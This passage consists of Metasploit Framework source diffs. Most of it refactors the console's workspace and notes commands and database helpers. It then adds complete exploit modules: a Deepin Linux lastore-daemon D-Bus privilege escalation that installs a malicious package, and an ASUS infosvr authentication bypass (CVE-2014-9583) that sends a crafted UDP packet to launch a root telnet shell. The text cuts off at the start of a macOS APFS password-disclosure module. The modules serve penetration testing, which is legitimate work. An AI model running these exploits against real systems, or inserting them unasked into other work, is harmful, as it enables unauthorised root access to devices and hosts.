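          'Nop'     => 'x86/opty2'           # returned by payload_nop
        }
      }
    ]
  ]
}
```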
@@ -142,26 +142,76 @@ class Db

     if adding and names
       # Add workspaces
-      workspace = nil
+      wspace = nil
       names.each do |name|
-        workspace = framework.db.add_workspace(name)
-        print_status("Added workspace: #{workspace.name}")
+        wspace = framework.db.workspaces(name: name).first
+        if wspace
+          print_status("Workspace '#{wspace.name}' already existed, switching to it.")
+        else
+          wspace = framework.db.add_workspace(name)
+          print_status("Added workspace: #{wspace.name}")
+        end
       end
-      framework.db.workspace = workspace
+      framework.db.workspace = wspace
+      print_status("Workspace: #{framework.db.workspace.name}")
     elsif deleting and names
-      status_msg, error_msg = framework.db.delete_workspaces(names)
-      print_msgs(status_msg, error_msg)
+      ws_ids_to_delete = []
+      starting_ws = framework.db.workspace
+      names.uniq.each do |n|
+        ws = framework.db.workspaces(name: n).first
+        ws_ids_to_delete << ws.id if ws
+      end
+      if ws_ids_to_delete.count > 0
+        deleted = framework.db.delete_workspaces(ids: ws_ids_to_delete)
+        process_deleted_workspaces(deleted, starting_ws)
+      else
+        print_status("No workspaces matching the given name(s) were found.")
+      end
     elsif delete_all
-      status_msg, error_msg = framework.db.delete_all_workspaces()
-      print_msgs(status_msg, error_msg)
+      ws_ids_to_delete = []
+      starting_ws = framework.db.workspace
+      framework.db.workspaces.each do |ws|
+        ws_ids_to_delete << ws.id
+      end
+      deleted = framework.db.delete_workspaces(ids: ws_ids_to_delete)
+      process_deleted_workspaces(deleted, starting_ws)
     elsif renaming
       if names.length != 2
         print_error("Wrong number of arguments to rename")
         return
       end

-      old, new = names
-      framework.db.rename_workspace(old, new)
+      ws_to_update = framework.db.find_workspace(names.first)
+      unless ws_to_update
+        print_error("Workspace '#{names.first}' does not exist")
+        return
+      end
+      opts = {
+        id: ws_to_update.id,
+        name: names.last
+      }
+      begin
+        if names.last == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
+          print_error("Unable to rename a workspace to '#{Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME}'")
+          return
+        end
+        updated_ws = framework.db.update_workspace(opts)
+        if updated_ws
+          framework.db.workspace = updated_ws if names.first == framework.db.workspace.name
+          print_status("Renamed workspace '#{names.first}' to '#{updated_ws.name}'")
+        else
+          print_error "There was a problem updating the workspace. Setting to the default workspace."
+          framework.db.workspace = framework.db.default_workspace
+          return
+        end
+        if names.first == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
+          print_status("Recreated default workspace")
+        end
+      rescue Exception => e
+        print_error "Failed to rename workspace: #{e.message}"
+        e.backtrace.each { |line| print_error "#{line}"}
+      end
+
     elsif names
       name = names.last
       # Switch workspace

@@ -174,12 +224,12 @@ class Db
         return
       end
     else
-      workspace = framework.db.workspace
+      current_workspace = framework.db.workspace

       unless verbose
         current = nil
         framework.db.workspaces.sort_by {|s| s.name}.each do |s|
-          if s.name == workspace.name
+          if s.name == current_workspace.name
             current = s.name
           else
             print_line(" #{s.name}")

@@ -188,8 +238,6 @@ class Db
         print_line("%red* #{current}%clr") unless current.nil?
         return
       end
-      workspace = framework.db.workspace

       col_names = %w{current name hosts services vulns creds loots notes}

       tbl = Rex::Text::Table.new(

@@ -199,17 +247,16 @@ class Db
         'SearchTerm' => search_term
       )

-      # List workspaces
-      framework.db.workspace_associations_counts.each do |ws|
+      framework.db.workspaces.each do |ws|
         tbl << [
-          ws[:name] == workspace.name ? '*' : '',
-          ws[:name],
-          ws[:hosts_count],
-          ws[:services_count],
-          ws[:vulns_count],
-          ws[:creds_count],
-          ws[:loots_count],
-          ws[:notes_count]
+          current_workspace.name == ws.name ? '*' : '',
+          ws.name,
+          framework.db.hosts(ws.name).count,
+          framework.db.services(ws.name).count,
+          framework.db.vulns({workspace: ws.name}).count,
+          framework.db.creds({workspace: ws.name}).count,
+          framework.db.loots(ws.name).count,
+          framework.db.notes({workspace: ws.name}).count
         ]
       end

@@ -218,6 +265,19 @@ class Db
     end
   end

+  def process_deleted_workspaces(deleted_workspaces, starting_ws)
+    deleted_workspaces.each do |ws|
+      print_status "Deleted workspace: #{ws.name}"
+      if ws.name == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
+        framework.db.workspace = framework.db.default_workspace
+        print_status 'Recreated the default workspace'
+      elsif ws == starting_ws
+        framework.db.workspace = framework.db.default_workspace
+        print_status "Switched to workspace: #{framework.db.workspace.name}"
+      end
+    end
+  end
+
   def cmd_workspace_tabs(str, words)
     return [] unless active?
     framework.db.workspaces.map { |s| s.name } if (words & ['-a','--add']).empty?
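The reworked `-d` path resolves workspace names to ids first and only then asks the data service to delete them. A toy, self-contained sketch of that flow; the `ToyDB` class below is a stand-in for `framework.db`, not the real DBManager:

```ruby
# Stand-in objects only: illustrates "resolve names -> ids, delete by ids,
# report what was actually removed", as the new cmd_workspace -d path does.
Workspace = Struct.new(:id, :name)

class ToyDB
  def initialize(workspaces)
    @workspaces = workspaces
  end

  def workspaces(name: nil)
    name ? @workspaces.select { |w| w.name == name } : @workspaces
  end

  def delete_workspaces(ids:)
    deleted = @workspaces.select { |w| ids.include?(w.id) }
    @workspaces -= deleted
    deleted
  end
end

db    = ToyDB.new([Workspace.new(1, 'default'), Workspace.new(2, 'staging')])
names = %w[staging missing]

ids = names.uniq.map { |n| db.workspaces(name: n).first }.compact.map(&:id)
if ids.any?
  db.delete_workspaces(ids: ids).each { |ws| puts "Deleted workspace: #{ws.name}" }
else
  puts 'No workspaces matching the given name(s) were found.'
end
```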
@@ -919,17 +979,17 @@ class Db
     print_line " -a,--add Add a note to the list of addresses, instead of listing"
     print_line " -d,--delete Delete the hosts instead of searching"
     print_line " -n,--note <data> Set the data for a new note (only with -a)"
-    print_line " -t <type1,type2> Search for a list of types"
+    print_line " -t,--type <type1,type2> Search for a list of types, or set single type for add"
     print_line " -h,--help Show this help information"
     print_line " -R,--rhosts Set RHOSTS from the results of the search"
-    print_line " -S,--search Regular expression to match for search"
+    print_line " -S,--search Search string to filter by"
     print_line " -o,--output Save the notes to a csv file"
-    print_line " --sort <field1,field2> Fields to sort by (case sensitive)"
+    print_line " -O <column> Order rows by specified column number"
     print_line
     print_line "Examples:"
     print_line " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41"
     print_line " notes -t smb.fingerprint 10.1.1.34 10.1.20.41"
-    print_line " notes -S 'nmap.nse.(http|rtsp)' --sort type,output"
+    print_line " notes -S 'nmap.nse.(http|rtsp)'"
     print_line
   end

@@ -944,21 +1004,22 @@ class Db
     host_ranges = []
     rhosts = []
     search_term = nil
-    out_file = nil
+    output_file = nil
+    delete_count = 0

     while (arg = args.shift)
       case arg
-      when '-a','--add'
+      when '-a', '--add'
         mode = :add
-      when '-d','--delete'
+      when '-d', '--delete'
         mode = :delete
-      when '-n','--note'
+      when '-n', '--note'
         data = args.shift
         if(!data)
           print_error("Can't make a note with no data")
           return
         end
-      when '-t'
+      when '-t', '--type'
         typelist = args.shift
         if(!typelist)
           print_error("Invalid type list")

@@ -968,12 +1029,17 @@ class Db
       when '-R', '--rhosts'
         set_rhosts = true
       when '-S', '--search'
-        search_term = /#{args.shift}/nmi
-      when '--sort'
-        sort_term = args.shift
+        search_term = args.shift
       when '-o', '--output'
-        out_file = args.shift
-      when '-h','--help'
+        output_file = args.shift
+      when '-O'
+        if (order_by = args.shift.to_i - 1) < 0
+          print_error('Please specify a column number starting from 1')
+          return
+        end
+      when '-u', '--update' # TODO: This is currently undocumented because it's not officially supported.
+        mode = :update
+      when '-h', '--help'
         cmd_notes_help
         return
       else

@@ -985,133 +1051,132 @@ class Db
     end

     if mode == :add
-      if types.nil? or types.size != 1
-        print_error("Exactly one note type is required")
+      if host_ranges.compact.empty?
+        print_error("Host address or range required")
         return
       end

+      if types && types.size != 1
+        print_error("Exactly one type is required")
+        return
+      end
+
+      if data.nil?
+        print_error("Data required")
+        return
+      end
+
       type = types.first
       host_ranges.each { |range|
         range.each { |addr|
-          host = framework.db.find_or_create_host(:host => addr)
-          break if not host
-          note = framework.db.find_or_create_note(:host => host, :type => type, :data => data)
+          note = framework.db.find_or_create_note(host: addr, type: type, data: data)
           break if not note
-          print_status("Time: #{note.created_at} Note: host=#{host.address} type=#{note.ntype} data=#{note.data}")
+          print_status("Time: #{note.created_at} Note: host=#{addr} type=#{note.ntype} data=#{note.data}")
         }
       }
       return
     end

-    note_list = []
-    delete_count = 0
-    # No host specified - collect all notes
-    if host_ranges.empty?
-      note_list = framework.db.notes.dup
-    # Collect notes of specified hosts
-    else
-      each_host_range_chunk(host_ranges) do |host_search|
-        framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
-          note_list.concat(host.notes)
-        end
+    if mode == :update
+      if types && types.size != 1
+        print_error("Exactly one type is required")
+        return
       end
-    end
-    if search_term
-      note_list = note_list.select do |n|
-        n.attribute_names.any? { |a| n[a.intern].to_s.match(search_term) }
+      if !types && !data
+        print_error("Update requires data or type")
+        return
       end
     end

-    # Sort the notes based on the sort_term provided
-    if sort_term != nil
-      sort_terms = sort_term.split(",")
-      note_list.sort_by! do |note|
-        orderlist = []
-        sort_terms.each do |term|
-          term = "ntype" if term == "type"
-          term = "created_at" if term == "Time"
-          if term == nil
-            orderlist << ""
-          elsif term == "service"
-            if note.service != nil
-              orderlist << make_sortable(note.service.name)
-            end
-          elsif term == "port"
-            if note.service != nil
-              orderlist << make_sortable(note.service.port)
-            end
-          elsif term == "output"
-            orderlist << make_sortable(note.data["output"])
-          elsif note.respond_to?(term, true)
-            orderlist << make_sortable(note.send(term))
-          elsif note.respond_to?(term.to_sym, true)
-            orderlist << make_sortable(note.send(term.to_sym))
-          elsif note.respond_to?("data", true) && note.send("data").respond_to?(term, true)
-            orderlist << make_sortable(note.send("data").send(term))
-          elsif note.respond_to?("data", true) && note.send("data").respond_to?(term.to_sym, true)
-            orderlist << make_sortable(note.send("data").send(term.to_sym))
-          else
-            orderlist << ""
-          end
-        end
-        orderlist
+    note_list = []
+    if host_ranges.compact.empty?
+      # No host specified - collect all notes
+      opts = {search_term: search_term}
+      opts[:ntype] = types if mode != :update && types && !types.empty?
+      note_list = framework.db.notes(opts)
+    else
+      # Collect notes of specified hosts
+      each_host_range_chunk(host_ranges) do |host_search|
+        break if !host_search.nil? && host_search.empty?
+
+        opts = {hosts: {address: host_search}, workspace: framework.db.workspace, search_term: search_term}
+        opts[:ntype] = types if mode != :update && types && !types.empty?
+        note_list.concat(framework.db.notes(opts))
       end
     end

     # Now display them
-    csv_table = Rex::Text::Table.new(
+    table = Rex::Text::Table.new(
       'Header'  => 'Notes',
       'Indent'  => 1,
-      'Columns' => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data']
+      'Columns' => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data'],
+      'SortIndex' => order_by
     )

+    matched_note_ids = []
     note_list.each do |note|
-      next if(types and types.index(note.ntype).nil?)
-      csv_note = []
-      msg = "Time: #{note.created_at} Note:"
-      csv_note << note.created_at if out_file
-      if (note.host)
+      if mode == :update
+        begin
+          update_opts = {id: note.id}
+          if types
+            note.ntype = types.first
+            update_opts[:ntype] = types.first
+          end
+
+          if data
+            note.data = data
+            update_opts[:data] = data
+          end
+
+          framework.db.update_note(update_opts)
+        rescue Exception => e
+          elog "There was an error updating note with ID #{note.id}: #{e.message}"
+          next
+        end
+      end
+
+      matched_note_ids << note.id
+
+      row = []
+      row << note.created_at
+
+      if note.host
         host = note.host
-        msg << " host=#{note.host.address}"
-        csv_note << note.host.address if out_file
+        row << host.address
         if set_rhosts
-          addr = (host.scope ? host.address + '%' + host.scope : host.address )
+          addr = (host.scope ? host.address + '%' + host.scope : host.address)
           rhosts << addr
         end
       else
-        csv_note << ''
+        row << ''
       end
-      if (note.service)
-        msg << " service=#{note.service.name}" if note.service.name
-        csv_note << note.service.name || '' if out_file
-        msg << " port=#{note.service.port}" if note.service.port
-        csv_note << note.service.port || '' if out_file
-        msg << " protocol=#{note.service.proto}" if note.service.proto
-        csv_note << note.service.proto || '' if out_file
+
+      if note.service
+        row << note.service.name || ''
+        row << note.service.port || ''
+        row << note.service.proto || ''
       else
-        if out_file
-          csv_note << '' # For the Service field
-          csv_note << '' # For the Port field
-          csv_note << '' # For the Protocol field
-        end
-      end
-      msg << " type=#{note.ntype} data=#{note.data.inspect}"
-      if out_file
-        csv_note << note.ntype
-        csv_note << note.data.inspect
-      end
-      if out_file
-        csv_table << csv_note
-      else
-        print_status(msg)
-      end
-      if mode == :delete
-        note.destroy
-        delete_count += 1
+        row << '' # For the Service field
+        row << '' # For the Port field
+        row << '' # For the Protocol field
       end
+
+      row << note.ntype
+      row << note.data.inspect
+      table << row
     end

-    if out_file
-      save_csv_notes(out_file, csv_table)
+    if mode == :delete
+      result = framework.db.delete_note(ids: matched_note_ids)
+      delete_count = result.size
+    end
+
+    if output_file
+      save_csv_notes(output_file, table)
+    else
+      print_line
+      print_line(table.to_s)
     end

     # Finally, handle the case where the user wants the resulting list

@@ -1122,33 +1187,17 @@ class Db
     }
   end

-  def save_csv_notes(fpath, csv_table)
+  def save_csv_notes(fpath, table)
     begin
       File.open(fpath, 'wb') do |f|
-        f.write(csv_table.to_csv)
+        f.write(table.to_csv)
       end
-      print_status("Notes saved as #{fpath}")
+      print_status("Wrote notes to #{fpath}")
     rescue Errno::EACCES => e
       print_error("Unable to save notes. #{e.message}")
     end
   end

-  def make_sortable(input)
-    case input
-    when String
-      input = input.downcase
-    when Integer
-      input = "%016" % input
-    when Time
-      input = input.strftime("%Y%m%d%H%M%S%L")
-    when NilClass
-      input = ""
-    else
-      input = input.inspect.downcase
-    end
-    input
-  end
-
   def cmd_loot_help
     print_line "Usage: loot <options>"
     print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
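Both the console listing and the `-o` CSV export now come from a single `Rex::Text::Table`, and the `-O` column number becomes the table's `SortIndex`. A standalone sketch, assuming the rex-text gem is installed; the rows are made-up sample data:

```ruby
# Build one table, sort it by a chosen column, then either print it or dump
# it to CSV - the same shape the reworked notes command uses.
require 'rex/text'

order_by = 1 # second column ("Host"), i.e. what `notes -O 2` selects

table = Rex::Text::Table.new(
  'Header'    => 'Notes',
  'Indent'    => 1,
  'Columns'   => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data'],
  'SortIndex' => order_by
)

table << ['2018-04-01 10:00:00', '10.1.20.41', 'smb',  445, 'tcp', 'smb.fingerprint', '{"os"=>"Windows"}']
table << ['2018-04-01 09:00:00', '10.1.1.34',  'http', 80,  'tcp', 'nmap.nse.http-title.tcp.80', '"Login"']

puts table.to_s                        # what `notes` prints
File.write('notes.csv', table.to_csv)  # what `notes -o notes.csv` saves
```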
@@ -1940,10 +1989,11 @@ class Db
     end

     endpoint = "#{protocol}://#{host}:#{port}"
-    remote_data_service = Metasploit::Framework::DataService::RemoteHTTPDataService.new(endpoint, https_opts)
+    remote_data_service = Metasploit::Framework::DataService::RemoteHTTPDataService.new(endpoint, framework, https_opts)
     begin
       framework.db.register_data_service(remote_data_service)
       print_line "Registered data service: #{remote_data_service.name}"
+      framework.db.workspace = framework.db.default_workspace
     rescue Exception => e
       print_error "There was a problem registering the remote data service: #{e.message}"
     end

@@ -1951,7 +2001,9 @@ class Db

   def set_data_service(service_id)
     begin
-      framework.db.set_data_service(service_id)
+      data_service = framework.db.set_data_service(service_id)
+      framework.db.workspace = framework.db.default_workspace
+      data_service
     rescue Exception => e
       print_error "Unable to set data service: #{e.message}"
     end

@@ -378,6 +378,7 @@ class Driver < Msf::Ui::Driver
         print_warning("\t#{path}: #{error}")
       end
     end
+    framework.db.workspace = framework.db.default_workspace

     framework.events.on_ui_start(Msf::Framework::Revision)
@@ -1,19 +1,54 @@
 module Msf
 module Util
 module DBManager
   # Creates search conditions to match the specified search string against all of the model's columns.
   #
   # @param model - An ActiveRecord model object
   # @param search - A string regex search
+  # @param column_name_skip_list - An array of strings containing column names to skip
   # @return Arel::Nodes::Or object that represents a search of all of the model's columns
-  def self.create_all_column_search_conditions(model, search)
+  def self.create_all_column_search_conditions(model, search, column_name_skip_list=nil)
     search = "(?mi)#{search}"
-    condition_set = model.columns.map do |column|
-      Arel::Nodes::Regexp.new(Arel::Nodes::NamedFunction.new("CAST", [model.arel_table[column.name].as("TEXT")]),
-                              Arel::Nodes.build_quoted(search))
-    end
+    # remove skip columns
+    columns = model.columns.reject { |column|
+      column_name_skip_list && column_name_skip_list.include?(column.name)
+    }
+
+    condition_set = columns.map { |column|
+      Arel::Nodes::Regexp.new(Arel::Nodes::NamedFunction.new("CAST", [model.arel_table[column.name].as("TEXT")]),
+                              Arel::Nodes.build_quoted(search))
+    }
     condition_set.reduce { |conditions, condition| conditions.or(condition).expr }
   end
+
+  # Processes the workspace value in the opts hash from a request. This method throws an exception if
+  # :workspace was not present but required was true, deletes the workspace from the hash, and
+  # looks up the workspace object by name, which it returns.
+  #
+  # @param [Hash] opts The opts hash passed in from the data request. Should contain :workspace if required is true.
+  # @param [Msf::Framework] framework A framework object containing a valid database connection.
+  # @param [Bool] required true if the :workspace key is required for this data operation. false if it is only optional.
+  # @return [Mdm::Workspace] The workspace object that was referenced by name in opts.
+  def self.process_opts_workspace(opts, framework, required = true)
+    wspace = delete_opts_workspace(opts)
+    if required && (wspace.nil? || ((wspace.kind_of? String) && wspace.empty?))
+      raise ArgumentError.new("opts must include a valid :workspace")
+    end
+
+    if wspace.kind_of? String
+      wspace = framework.db.find_workspace(wspace)
+    end
+    wspace
+  end
+
+  # Removes the :workspace or :wspace key from the opts hash.
+  #
+  # @param [Hash] opts The opts hash passed in from the data request.
+  # @return [String] The name of the workspace that was contained in the key.
+  def self.delete_opts_workspace(opts)
+    wlog("Both :workspace and :wspace were found in opts. Using :workspace.") if opts[:workspace] && opts[:wspace]
+    opts.delete(:workspace) || opts.delete(:wspace)
+  end
 end
 end
 end
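A hedged usage sketch of the extended helper: it assumes a connected database and the `Mdm::Host` model from metasploit_data_models being loaded, and the skip list and search string are purely illustrative — this is not code from the diff itself.

```ruby
# Illustrative only: build the case-insensitive, all-column regexp condition
# while skipping timestamp columns, then feed the Arel node to a scope.
conditions = Msf::Util::DBManager.create_all_column_search_conditions(
  Mdm::Host,
  'windows',                     # wrapped as "(?mi)windows" internally
  ['created_at', 'updated_at']   # columns excluded from the CAST/REGEXP match
)

matching_hosts = Mdm::Host.where(conditions)
```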
@@ -376,12 +376,13 @@ module Rex
         reported = []
         @report_data[:ports].each do |svc|
           scripts = svc.delete(:scripts) || []
-          svc_obj = db_report(:service, svc.merge(:host => host_object))
+          wspace = db.workspaces({:id => host_object.workspace.id}).first
+          svc_obj = db_report(:service, svc.merge(:host => host_object, :workspace => wspace.name))
           scripts.each do |script|
             script.each_pair do |k,v|
               ntype =
               nse_note = {
-                :workspace => host_object.workspace,
+                :workspace => wspace,
                 :host => host_object,
                 :service => svc_obj,
                 :type => "nmap.nse.#{k}." + (svc[:proto] || "tcp") +".#{svc[:port]}",
@@ -138,7 +138,7 @@ Gem::Specification.new do |spec|
   # Core of the Ruby Exploitation Library
   spec.add_runtime_dependency 'rex-core'
   # Text manipulation library for things like generating random string
-  spec.add_runtime_dependency 'rex-text', ["< 0.2.18"]
+  spec.add_runtime_dependency 'rex-text'
   # Library for Generating Randomized strings valid as Identifiers such as variable names
   spec.add_runtime_dependency 'rex-random_identifier'
   # library for creating Powershell scripts for exploitation purposes
@@ -0,0 +1,172 @@ (new file; all lines added)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'lastore-daemon D-Bus Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on Deepin Linux systems
        by using lastore-daemon to install a package.

        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
        user in the sudo group to install arbitrary system packages without
        providing a password, resulting in code execution as root. By default,
        the first user created on the system is a member of the sudo group.

        This module has been tested successfully with lastore-daemon version
        0.9.53-1 on Deepin Linux 15.5 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          "King's Way",   # Discovery and exploit
          'Brendan Coles' # Metasploit
        ],
      'DisclosureDate' => 'Feb 2 2016',
      'References'     =>
        [
          [ 'EDB', '39433' ],
          [ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
        ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def mkdir(path)
    vprint_status "Creating '#{path}' directory"
    cmd_exec "mkdir -p #{path}"
    register_dir_for_cleanup path
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def command_exists?(cmd)
    cmd_exec("command -v #{cmd} && echo true").include? 'true'
  end

  def dbus_priv?
    res = install_package '', ''
    (res.include? 'DBus.Error.AccessDenied') ? false : true
  end

  def install_package(name, path)
    dbus_send dest: 'com.deepin.lastore',
              type: 'method_call',
              path: '/com/deepin/lastore',
              interface: 'com.deepin.lastore.Manager.InstallPackage',
              contents: "string:'#{name}' string:'#{path}'"
  end

  def remove_package(name)
    dbus_send dest: 'com.deepin.lastore',
              type: 'method_call',
              path: '/com/deepin/lastore',
              interface: 'com.deepin.lastore.Manager.RemovePackage',
              contents: "string:' ' string:'#{name}'"
  end

  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end

  def check
    %w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
      unless command_exists? cmd
        vprint_error "#{cmd} is not installed. Exploitation will fail."
        return CheckCode::Safe
      end
      vprint_good "#{cmd} is installed"
    end

    unless dbus_priv?
      vprint_error 'User is not permitted to install packages. Exploitation will fail.'
      return CheckCode::Safe
    end
    vprint_good 'User is permitted to install packages'

    CheckCode::Appears
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    print_status 'Building package...'

    payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
    payload_path = "#{base_dir}/#{payload_name}"
    pkg_name = rand_text_alphanumeric rand(10..15)
    pkg_path = "#{base_dir}/.#{pkg_name}"

    mkdir "#{pkg_path}/DEBIAN"
    pkg = "Package: #{pkg_name}\n"
    pkg << "Version: 0.1\n"
    pkg << "Maintainer: #{pkg_name}\n"
    pkg << "Architecture: all\n"
    pkg << "Description: #{pkg_name}\n"
    upload "#{pkg_path}/DEBIAN/control", pkg
    upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"

    cmd_exec "dpkg-deb --build '#{pkg_path}'"

    unless file_exist? "#{pkg_path}.deb"
      fail_with Failure::Unknown, 'Building package failed'
    end

    print_status 'Uploading payload...'
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Installing package...'
    res = install_package pkg_name, "#{pkg_path}.deb"
    vprint_line res

    unless res.include? 'object path'
      fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
    end

    Rex.sleep 15

    print_status 'Removing package...'
    res = remove_package pkg_name.downcase
    vprint_line res

    unless res.include? 'object path'
      print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
    end
  end
end
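For clarity, this is the command line the module's `dbus_send` helper ends up running for the `InstallPackage` call; the package name and path below are placeholders, not values the module actually generates.

```ruby
# Prints the dbus-send invocation built by install_package (placeholder values).
name = 'mypkg'
path = '/tmp/.mypkg.deb'

cmd = "dbus-send --system --print-reply " \
      "--dest=com.deepin.lastore " \
      "--type=method_call " \
      "/com/deepin/lastore " \
      "com.deepin.lastore.Manager.InstallPackage " \
      "string:'#{name}' string:'#{path}'"

puts cmd
```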
@@ -0,0 +1,141 @@ (new file; all lines added)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ASUS infosvr Auth Bypass Command Execution',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability in the
        infosvr service running on UDP port 9999 on various ASUS routers to
        execute arbitrary commands as root.

        This module launches the BusyBox Telnet daemon on the port specified
        in the TelnetPort option to gain an interactive remote shell.

        This module was tested successfully on an ASUS RT-N12E with firmware
        version 2.0.0.35.

        Numerous ASUS models are reportedly affected, but untested.
      },
      'Author'      =>
        [
          'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
          'jduck',                   # Independent discovery and C exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'unix',
      'References'  =>
        [
          ['CVE', '2014-9583'],
          ['EDB', '35688'],
          ['URL', 'https://github.com/jduck/asus-cmd']
        ],
      'DisclosureDate' => 'Jan 4 2015',
      'Privileged'  => true,
      'Arch'        => ARCH_CMD,
      'Payload'     =>
        {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Targets'     => [['Automatic', {}]],
      'DefaultTarget' => 0))
    register_options [
      Opt::RPORT(9999),
      OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
      OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
      OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
    ]
    register_advanced_options [
      # If the session is killed (CTRL+C) rather than exiting cleanly,
      # the telnet port remains open, but is unresponsive, and prevents
      # re-exploitation until the device is rebooted.
      OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
    ]
  end

  def telnet_timeout
    (datastore['TelnetTimeout'] || 10)
  end

  def telnet_port
    datastore['TelnetPort']
  end

  def request(cmd)
    pkt = ''
    # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
    pkt << "\x0C"
    # PacketType [byte] ; NET_PACKET_TYPE_CMD
    pkt << "\x15"
    # OpCode [word] ; NET_CMD_ID_MANU_CMD
    pkt << "\x33\x00"
    # Info [dword] ; Comment: "Or Transaction ID"
    pkt << Rex::Text.rand_text_alphanumeric(4)
    # MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
    pkt << Rex::Text.rand_text_alphanumeric(6)
    # Password [byte[32]] ; Not checked at all
    pkt << "\x00" * 32
    # Command Length + \x00 + Command padded to 512 bytes
    pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
  end

  def exploit
    connect_udp
    print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
    udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
    disconnect_udp

    vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
    Rex.sleep 3

    vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."

    sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
                                  'PeerPort' => telnet_port,
                                  'Context'  => { 'Msf' => framework, 'MsfExploit' => self },
                                  'Timeout'  => telnet_timeout

    if sock.nil?
      fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
    end

    vprint_status "#{rhost} - Trying to establish a telnet session..."

    prompt = negotiate_telnet sock
    if prompt.nil?
      sock.close
      fail_with Failure::Unknown, 'Unable to establish a telnet session'
    end

    print_good "#{rhost} - Telnet session successfully established..."

    handler sock
  end

  def negotiate_telnet(sock)
    prompt = '#'
    Timeout.timeout(datastore['TelnetBannerTimeout']) do
      while true
        data = sock.get_once(-1, telnet_timeout)
        if !data or data.length == 0
          return nil
        elsif data.include? prompt
          return true
        end
      end
    end
  rescue ::Timeout::Error
    return nil
  end
end
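The `request` method above fills a fixed 512-byte structure. A standalone sketch of the same layout in plain Ruby; the random fields are stubbed with SecureRandom and the telnetd command is the one the module sends, but this snippet only builds the buffer, it does not talk to a device.

```ruby
# Build the 512-byte infosvr request locally to inspect its layout.
require 'securerandom'

cmd = 'telnetd -l /bin/sh -p 4444'

pkt = String.new
pkt << "\x0C"                        # ServiceID: NET_SERVICE_ID_IBOX_INFO
pkt << "\x15"                        # PacketType: NET_PACKET_TYPE_CMD
pkt << "\x33\x00"                    # OpCode: NET_CMD_ID_MANU_CMD
pkt << SecureRandom.alphanumeric(4)  # Info / transaction ID
pkt << SecureRandom.alphanumeric(6)  # MAC address field (never compared correctly)
pkt << "\x00" * 32                   # Password field (not checked at all)
pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust(512 - pkt.length, "\x00")

puts pkt.bytesize # => 512
```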
@@ -0,0 +1,71 @@ (new file; all lines added)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Mac OS X APFS Encrypted Volume Password Disclosure',
      'Description' => %q(
        This module exploits a flaw in OSX 10.13 through 10.13.3
        that discloses the passwords of encrypted APFS volumes.

